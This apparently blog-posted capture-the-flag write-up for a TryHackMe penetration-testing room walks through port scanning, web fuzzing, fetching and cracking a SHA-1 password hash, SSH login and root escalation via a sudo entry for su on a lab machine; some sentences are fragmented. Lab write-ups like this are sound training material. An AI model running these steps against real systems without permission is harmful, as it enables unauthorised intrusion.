THM: Crash Course Pen Testing
Write-up for final challenge at CC: Pen Testing room at TryHackMe
|Name||Try Hack Me / CC: Pen Testing|
|Author||Asentinn / OkabeRintaro|
Target IP is
10.10.113.202 - I'm assigning that to the variable for ease of use.
Scanning for open ports
$ nmap -sC -sV -p- $IP -oN nmap-$IP.out
And prepare input for the
$ nmap -sC -sV -p 22,80 $IP -oX nmap-$IP.xml $ searchsploit --nmap nmap-10.10.113.202.xml
fuff for practice
$ nikto -h $IP -o nikto-$IP.txt
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/FUZZ -recursion -recursion-depth 1 -e .txt,.php -v -of md -o fuzz-$IP.md
ffufcommand can be a little complicated, so let me explain it a bit
-w: wordlist for fuzzing
-u: target URL
fufffinds a directory, it starts another scan after the current finished (you will recognize it by
-e: useful one, simultaneously tries to look for files with listed extensions - be careful with this one though, as it multiplies the amount of work by N where N is a number of extensions (because for each wordlist entry it tries appending these extensions).
-v: shows full URL of the findings (useful when using
-of: output format,
ffufoutput files are not the easiest one to read, but and I choose the Markdown for now
-o: and this is just a name for the output file;
$IPwill resolve variable name and the result
Cracking user password
Both find out the
/secret/ directory and
fuff further tracked the
$ curl http://10.10.200.35/secret/secret.txt
Which definitely is the hash of user password. I will be using john to crack it, and it could be run blindly on that file, but lets use the
hash-identifier that comes with Kali to see the output just out of curiosity.
$ hash-identifier 046385855FC9580393853D8E81F240B66FE9A7B8
As we can see it is the SHA-1 hash. Now cracking it with
$ john -format=Raw-SHA1 secret.txt
Which was really fast (don't ever use such weak passwords, of course). So we've got credentials nyan/nyan. Try logging with these on the SSH.
$ ssh nyan@$IP
Were in. I'm getting the user flag.
nyan@ubuntu:~$ cat user.txt
User nyan can run /bin/su as a root without specifying its password
And just by seeing this sudoer entry we know that nyan is a can execute
Otherwise when running
sudo -lwe would see
Sorry, user nyan may not run sudo on ubuntu(where
ubuntuis the host name)
We got the root! So
cat out that flag and complete the box.
root@ubuntu:/home/nyan# cat /root/root.txt
📌 Follow the
#CyberEthicalhashtag on the social media
🎁 Become a Patron and gain additional benefits
👾 Join CyberEthical Discord server
👉 Instagram: @cyber.ethical.me
👉 LinkedIn: Kamil Gierach-Pacanek
👉 Twitter: @cyberethical_me
👉 Facebook: @CyberEthicalMe
Interested in reading more such articles from Kamil Gierach-Pacanek?
Support the author by donating an amount of your choice.